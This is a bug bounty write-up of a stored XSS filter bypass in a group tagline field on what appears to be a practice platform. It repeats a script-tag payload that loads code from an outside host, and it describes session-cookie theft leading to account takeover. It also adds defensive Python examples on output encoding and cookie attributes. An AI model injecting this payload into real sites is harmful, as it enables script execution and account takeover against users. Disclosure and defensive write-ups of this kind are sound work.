bugbountyhunter scope BARKER: Fifth Blood (第五滴血) stored XSS filter bypass report

Posted by sec875 on 2024-08-02

After some simple payload debugging, I found that a filter is in place.

Checked: https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet

Found that the payload <script%20src=//sec875.com/1.html%0A--%3E works.

Visit https://5cc259cfb319-sec875.a.barker-social.com/group/11 to trigger the XSS payload.

HackerOne treats the steps above as a valid report.

Post-exploitation: deploy a VPS, or point local DNS at 127.0.0.1, to prove that the XSS executes (an SSL/HTTP endpoint needs to be deployed).

Open question: after observing several times, the value of the tagline field is reflected on multiple pages. Is the filter still present in those places?

Report title: Stored Cross-Site Scripting (XSS)
Endpoint: https://5cc259cfb319-sec875.a.barker-social.com/group/11/edit
Vulnerable parameter: tagline
Payload: POST tagline parameter <script%20src=//sec875.com/1.html%0A--%3E

Body
I have discovered a stored XSS vulnerability affecting the endpoint 'group/11/edit' in the parameter 'tagline'. The payload requires a filter bypass and is simple: <script%20src=//sec875.com/1.html%0A--%3E

You can see a working proof of concept here:
https://5cc259cfb319-sec875.a.barker-social.com/group/11/
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554030/s8kv0pckkeyaxfuijrh3.png)

To reproduce:
1. After logging in, create a group and go to the following location

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554027/frqlt97d6oh4rtjrtbpl.png)

2. After simple debugging, I found that there is a filter. I checked https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet and found that the payload <script%20src=//sec875.com/1.html%0A--%3E is valid.

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554027/frqlt97d6oh4rtjrtbpl.png)

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554029/jsv9dlgesgv0fkgzy21c.png)

3. Visit https://5cc259cfb319-sec875.a.barker-social.com/group/11 to trigger the XSS payload

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554029/ml2lep1mclz0m3itvbbi.png)

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554030/s8kv0pckkeyaxfuijrh3.png)

4. Post-exploitation: you can deploy a VPS or point local DNS to 127.0.0.1. It has been proven that the XSS can be executed (SSL/HTTP needs to be deployed). You will observe the XSS executing.

Payload used: <script%20src=//sec875.com/1.html%0A--%3E. There is filtering on the parameter 'tagline'.
Vulnerable parameter: tagline
Endpoint/URL: https://5cc259cfb319-sec875.a.barker-social.com/group/11/edit
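Why the payload above slips past a filter, and why output encoding does not have the same blind spot, shown as an added example (this is not BARKER's code; the blocklist below is a hypothetical stand-in for whatever the target uses, and only the payload is taken from the report). Once `%0A` is URL-decoded, a newline sits between the `src` attribute and the closing `-->`; a pattern written with `.` never crosses that newline, while the HTML tokenizer simply ends the unquoted attribute value at the whitespace, treats `--` as a junk attribute name and closes the tag at `>`.

```python
"""Line-based blocklist vs. output encoding for the tagline payload.

Added example, not the target's code.  NAIVE_SCRIPT_TAG is a hypothetical
filter; the payload string is the one from the report.
"""
from __future__ import annotations

import html
import re
from urllib.parse import unquote

# Payload exactly as it appears in the POST body (URL-encoded) ...
RAW_PAYLOAD = "<script%20src=//sec875.com/1.html%0A--%3E"
# ... and as the application sees it after decoding:
#   '<script src=//sec875.com/1.html\n-->'
PAYLOAD = unquote(RAW_PAYLOAD)

# Hypothetical blocklist: reject any "<script ...>" tag.  Without re.DOTALL,
# '.' does not match '\n', so the search never reaches the closing '>'.
NAIVE_SCRIPT_TAG = re.compile(r"<script.*?>", re.IGNORECASE)


def naive_filter_blocks(value: str) -> bool:
    """True when the hypothetical blocklist would reject this tagline."""
    return NAIVE_SCRIPT_TAG.search(value) is not None


def browser_sees_script_tag(value: str) -> bool:
    """Rough model of the tokenizer: '<script', then anything (newlines
    included) up to the first '>'.  '[^>]' matches '\n', unlike '.'."""
    return re.search(r"<script[^>]*>", value, re.IGNORECASE) is not None


def render_tagline(value: str) -> str:
    """Context-aware fix: encode on output into an HTML text node, so the
    stored value can no longer open a tag regardless of how it was spelled."""
    return f'<p class="tagline">{html.escape(value, quote=True)}</p>'


if __name__ == "__main__":
    print("decoded payload:", repr(PAYLOAD))
    print("naive filter blocks it:", naive_filter_blocks(PAYLOAD))
    print("browser parses a script tag:", browser_sees_script_tag(PAYLOAD))
    print("encoded on output:", render_tagline(PAYLOAD))
```

The point for the fix: tightening the pattern (for example `[^>]*` instead of `.*?`) would catch this one spelling, but a blocklist is always one tokenizer quirk behind the browser; encoding the stored value for the HTML context it is rendered into removes the whole class of bypasses, and it should be applied on every page the tagline is reflected into, which is exactly the open question raised earlier in the post.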

Impact:
As the session cookies are not protected by HttpOnly, we can obtain these and achieve account takeover. As well as this, the CSRF token is stored in the DOM, which enables us to easily perform actions on behalf of the user.
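A small check for the cookie side of the impact statement, added here as an example rather than taken from the report or the platform: it parses a Set-Cookie header and lists the attributes that are missing. The two sample headers are constructed for illustration.

```python
"""Flag session cookies that lack HttpOnly, Secure or a restrictive SameSite.

Added example; the headers in SAMPLE_HEADERS are constructed, not captured
from the target.
"""
from __future__ import annotations


def missing_cookie_protections(set_cookie: str) -> list[str]:
    """Return the protections absent from one Set-Cookie header value.

    Attribute names are case-insensitive per RFC 6265, so they are lowered
    before comparison.  The first 'name=value' part is the cookie itself.
    """
    parts = [p.strip() for p in set_cookie.split(";") if p.strip()]
    attrs: dict[str, str] = {}
    for part in parts[1:]:
        name, _, value = part.partition("=")
        attrs[name.strip().lower()] = value.strip()

    missing: list[str] = []
    if "httponly" not in attrs:
        missing.append("HttpOnly")        # script can read document.cookie
    if "secure" not in attrs:
        missing.append("Secure")          # cookie also sent over plain HTTP
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        missing.append("SameSite=Lax/Strict")
    return missing


# Constructed sample headers: one as a weak deployment might emit it, one
# with the attributes set.
SAMPLE_HEADERS = {
    "weak": "session=abc123; Path=/",
    "hardened": "session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax",
}


def audit(headers: dict[str, str]) -> dict[str, list[str]]:
    """Run the check over a set of named Set-Cookie values."""
    return {name: missing_cookie_protections(h) for name, h in headers.items()}


if __name__ == "__main__":
    for name, missing in audit(SAMPLE_HEADERS).items():
        print(f"{name}: {'OK' if not missing else 'missing ' + ', '.join(missing)}")
```

HttpOnly only stops the cookie value from being read; script running in the origin can still drive the session and read a CSRF token placed in the DOM, so the attribute limits the blast radius of the finding and does not replace fixing the injection itself.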
